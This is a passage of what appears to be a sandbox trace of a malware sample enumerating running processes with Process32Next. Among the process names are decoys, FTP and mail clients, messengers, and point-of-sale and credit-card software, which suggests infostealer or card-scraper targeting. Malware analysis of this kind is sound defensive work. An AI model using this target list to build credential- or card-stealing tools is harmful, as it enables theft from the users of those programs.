hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x390, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0249.601] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0249.603] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0249.680] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x210, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0249.685] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x460, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0249.687] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0249.689] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x54c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0249.691] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x604, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0249.694] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x64c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0249.695] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2e, th32ParentProcessID=0x798, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0249.697] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0249.703] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x894, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0249.705] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x908, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0249.707] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbd0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIADAP.exe")) returned 1 [0249.709] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xba8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0249.711] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xad4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0249.713] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x670, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0249.717] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x9d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0249.719] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x128, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x670, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0249.720] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x428, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="degree_sing_pretty.exe")) returned 1 [0249.721] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x840, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="work-heavy.exe")) returned 1 [0249.723] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="member.exe")) returned 1 [0249.724] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="real-new.exe")) returned 1 [0249.726] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="letter.exe")) returned 1 [0249.727] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc04, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="lightwhere.exe")) returned 1 [0249.728] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="charge_model_ready.exe")) returned 1 [0249.798] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd14, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="fearfew.exe")) returned 1 [0249.799] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="bag-begin-gas.exe")) returned 1 [0249.801] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd64, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="take whether.exe")) returned 1 [0249.802] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="common trade station.exe")) returned 1 [0249.804] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xda8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="small_money.exe")) returned 1 [0249.805] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdbc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="magazineofficialteach.exe")) returned 1 [0249.806] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="involve.exe")) returned 1 [0249.818] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdd4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="religious_free_generation.exe")) returned 1 [0249.819] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="hair friend will.exe")) returned 1 [0249.821] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdf4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="whose.exe")) returned 1 [0249.822] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe80, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="3dftp.exe")) returned 1 [0249.829] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="absolutetelnet.exe")) returned 1 [0249.830] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe94, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="alftp.exe")) returned 1 [0249.832] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="barca.exe")) returned 1 [0249.833] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xeb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="bitkinex.exe")) returned 1 [0249.835] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xeb8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="coreftp.exe")) returned 1 [0249.836] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xec4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="far.exe")) returned 1 [0249.838] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xecc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="filezilla.exe")) returned 1 [0249.843] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xed4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="flashfxp.exe")) returned 1 [0249.844] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xedc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="fling.exe")) returned 1 [0249.846] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf04, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="foxmailincmail.exe")) returned 1 [0249.848] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf0c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="gmailnotifierpro.exe")) returned 1 [0249.850] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf14, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="icq.exe")) returned 1 [0249.851] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf1c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="leechftp.exe")) returned 1 [0249.853] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf30, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="ncftp.exe")) returned 1 [0249.950] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="notepad.exe")) returned 1 [0249.952] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf4c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="operamail.exe")) returned 1 [0249.954] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf54, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="outlook.exe")) returned 1 [0249.956] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="pidgin.exe")) returned 1 [0249.957] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf68, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="scriptftp.exe")) returned 1 [0249.959] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="skype.exe")) returned 1 [0249.961] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf8c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="smartftp.exe")) returned 1 [0249.962] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf98, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="thunderbird.exe")) returned 1 [0249.989] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfa0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="trillian.exe")) returned 1 [0249.991] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="webdrive.exe")) returned 1 [0249.993] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfb8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="whatsapp.exe")) returned 1 [0249.994] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfd0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="winscp.exe")) returned 1 [0249.996] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfe0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="yahoomessenger.exe")) returned 1 [0249.998] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xff4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="active-charge.exe")) returned 1 [0250.000] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x878, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="accupos.exe")) returned 1 [0250.001] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x858, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="afr38.exe")) returned 1 [0250.003] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="aldelo.exe")) returned 1 [0250.005] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe54, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="ccv_server.exe")) returned 1 [0250.006] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x660, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="centralcreditcard.exe")) returned 1 [0250.008] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb2c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="creditservice.exe")) returned 1 [0250.009] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x72c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="edcsvr.exe")) returned 1 [0250.124] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1004, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="fpos.exe")) returned 1 [0250.126] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1014, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="isspos.exe")) returned 1 [0250.127] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x101c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="mxslipstream.exe")) returned 1 [0250.130] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x102c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="omnipos.exe")) returned 1 [0250.132] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x103c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="spcwin.exe")) returned 1 [0250.133] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1048, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="spgagentservice.exe")) returned 1 [0250.135] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1054, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="utg2.exe")) returned 1 [0250.139] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x108c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="discussion.exe")) returned 1 [0250.141] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1094, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="styledesignbusiness.exe")) returned 1 [0250.142] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x109c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="new_door.exe")) returned 1 [0250.144] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="bed fight.exe")) returned 1 [0250.145] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="federal hotel.exe")) returned 1 [0250.147] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: 